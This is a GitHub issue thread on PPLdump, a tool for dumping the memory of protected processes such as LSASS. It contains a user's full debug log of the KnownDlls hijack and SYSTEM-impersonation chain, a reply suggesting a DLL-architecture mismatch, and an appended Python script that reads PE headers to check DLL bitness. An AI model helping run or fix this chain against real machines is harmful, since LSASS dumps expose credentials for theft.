itm4n / PPLdump

Dump the memory of a PPL with a userland exploit
MIT License

No Extract Produced #9

Open g33k247 opened 2 years ago

g33k247 commented 2 years ago

Successfully compiled the code and ran it from an admin terminal with debug, but didn't get the expected extraction of lsass.dmp. Everything appeared to be working fine up until the last couple of lines. Any thoughts are appreciated!

PS C:\Users\xxxxx\git\PPLdump\x64\Release> .\PPLdump.exe -d -f lsass lsass.dmp
[xxxxx] [] Found a process with name 'lsass' and PID 1180
[DEBUG][xxxxx] Check requirements
[DEBUG][xxxxx] Target process protection level: 4 - PsProtectedSignerLsa-Light
[xxxxx] [] Requirements OK
[DEBUG][xxxxx] Get the name of the DLL to hijack
[xxxxx] [] DLL to hijack: EventAggregation.dll
[xxxxx] [] Current user is SYSTEM? -> FALSE
[DEBUG][xxxxx] Found a potential Process candidate: PID=1152 - Image='LsaIso.exe' - User='NT AUTHORITY\SYSTEM'
[DEBUG][xxxxx] This token is not restricted.
[DEBUG][xxxxx] Found 2/2 required privileges in token.
[DEBUG][xxxxx] Found a valid Token candidate.
[SYSTEM] [] Impersonating SYSTEM...
[DEBUG][SYSTEM] Create object directory '\GLOBAL??\KnownDlls'...
[SYSTEM] [] Created Object Directory: '\GLOBAL??\KnownDlls'
[DEBUG][SYSTEM] Create symbolic link '\GLOBAL??\KnownDlls\EventAggregation.dll'...
[SYSTEM] [] Created Symbolic link: '\GLOBAL??\KnownDlls\EventAggregation.dll'
[DEBUG][xxxxx] Create symbolic link '\??\GLOBALROOT -> \GLOBAL??'...
[xxxxx] [] Created symbolic link: '\??\GLOBALROOT -> \GLOBAL??'
[DEBUG][xxxxx] Call DefineDosDevice to create '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll'
[-] DefineDosDevice failed with error code 183 - Cannot create a file when that file already exists.
[xxxxx] [] DefineDosDevice OK
[DEBUG][xxxxx] Impersonate SYSTEM again
[SYSTEM] [] Impersonating SYSTEM...
[DEBUG][SYSTEM] Check whether the symbolic link was really created in '\KnownDlls\'
[SYSTEM] [+] The symbolic link was successfully created: '\KnownDlls\EventAggregation.dll' -> '\KernelObjects\EventAggregation.dll'
[DEBUG][SYSTEM] Map our DLL to section '\KernelObjects\EventAggregation.dll'
[DEBUG][SYSTEM] Loaded payload DLL, image size: 128512 bytes
[DEBUG][SYSTEM] Found file for transaction: C:\WINDOWS\system32\appverifUI.dll
[DEBUG][SYSTEM] Opened file 'C:\WINDOWS\system32\appverifUI.dll' for transaction.
[DEBUG][SYSTEM] Wrote 128512 bytes of embedded payload DLL to transacted file.
[SYSTEM] [] Mapped payload DLL to: '\KernelObjects\EventAggregation.dll'
[DEBUG][SYSTEM] Enable privilege SeAssignPrimaryTokenPrivilege
[DEBUG][SYSTEM] Create a primary token
[DEBUG][SYSTEM] Create protected process with command line: C:\WINDOWS\system32\services.exe 1180 "lsass.dmp" b01c2517-790a-4bec-aa9b-cb576e7f712 -d
[SYSTEM] [] Started protected process, waiting...
[DEBUG][SYSTEM] Unmap section '\KernelObjects\EventAggregation.dll'...
[DEBUG][SYSTEM] Process exit code: 0
[-] The DLL was not loaded. :/
PS C:\Users\xxxxx\git\PPLdump\x64\Release> ls

aaaddress1 commented 2 years ago

Ensure that the arch of the DLL for hijacking is the same as LSASS, e.g. a 64-bit DLL for 64-bit LSASS? It seems like your DLL is okay & mapped into the symbol object directory (KernelObjects) but not loaded by the app loader of the new service (PPL mode).
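The reply above suggests checking that the DLL's architecture matches the target process. The following is an added example, not code from the PPLdump project or from either commenter: it reads the COFF `Machine` field, the optional-header magic (PE32 vs PE32+) and the `IMAGE_FILE_DLL` characteristic straight from a PE image, which is enough to tell a 32-bit DLL from a 64-bit one without loading it. The function names (`pe_info`, `dll_fits_process`, `build_minimal_pe`) are this example's own, and the sample PE headers it parses are constructed inline so it runs offline; the bitness of the target process (64 for x64 LSASS) is an input you supply.

```python
import struct
import sys

# IMAGE_FILE_MACHINE_* values from the PE/COFF specification.
MACHINES = {
    0x014C: "I386",
    0x01C4: "ARMNT",
    0x8664: "AMD64",
    0xAA64: "ARM64",
}
IMAGE_FILE_DLL = 0x2000          # Characteristics flag: image is a DLL
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_info(data: bytes) -> dict:
    """Return machine name, bitness and DLL flag parsed from a PE image's headers.

    Raises ValueError for anything that is not a well-formed PE header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    coff = e_lfanew + 4                      # COFF file header follows "PE\0\0"
    if coff + 20 + 2 > len(data) or data[e_lfanew:coff] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, _nsect, _ts, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    if opt_size < 2:
        raise ValueError("no optional header")
    (magic,) = struct.unpack_from("<H", data, coff + 20)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    return {
        "machine": MACHINES.get(machine, f"0x{machine:04x}"),
        "bits": 64 if magic == PE32PLUS_MAGIC else 32,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
    }


def is_pe(data: bytes) -> bool:
    """True if pe_info() accepts the image."""
    try:
        pe_info(data)
        return True
    except ValueError:
        return False


def dll_fits_process(dll: bytes, process_bits: int) -> bool:
    """A DLL can only be loaded by a process of the same bitness."""
    info = pe_info(dll)
    return info["is_dll"] and info["bits"] == process_bits


def build_minimal_pe(machine: int, is_dll: bool, bits: int) -> bytes:
    """Constructed sample: the smallest header layout pe_info() will accept.

    DOS stub with e_lfanew = 0x40, PE signature, 20-byte COFF header whose
    SizeOfOptionalHeader is 2, and a 2-byte optional header holding only the magic.
    """
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    characteristics = IMAGE_FILE_DLL if is_dll else 0
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 2, characteristics)
    opt = struct.pack("<H", PE32PLUS_MAGIC if bits == 64 else PE32_MAGIC)
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    # Usage: python pe_arch.py C:\path\to\some.dll ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, pe_info(fh.read()))
```

On a real file the whole image is read and only the first few hundred bytes are inspected, so the check is cheap; a mismatch between `bits` and the process (or `is_dll` being false) is a loader-level reason the image would never be mapped, independent of any signature or protection-level check.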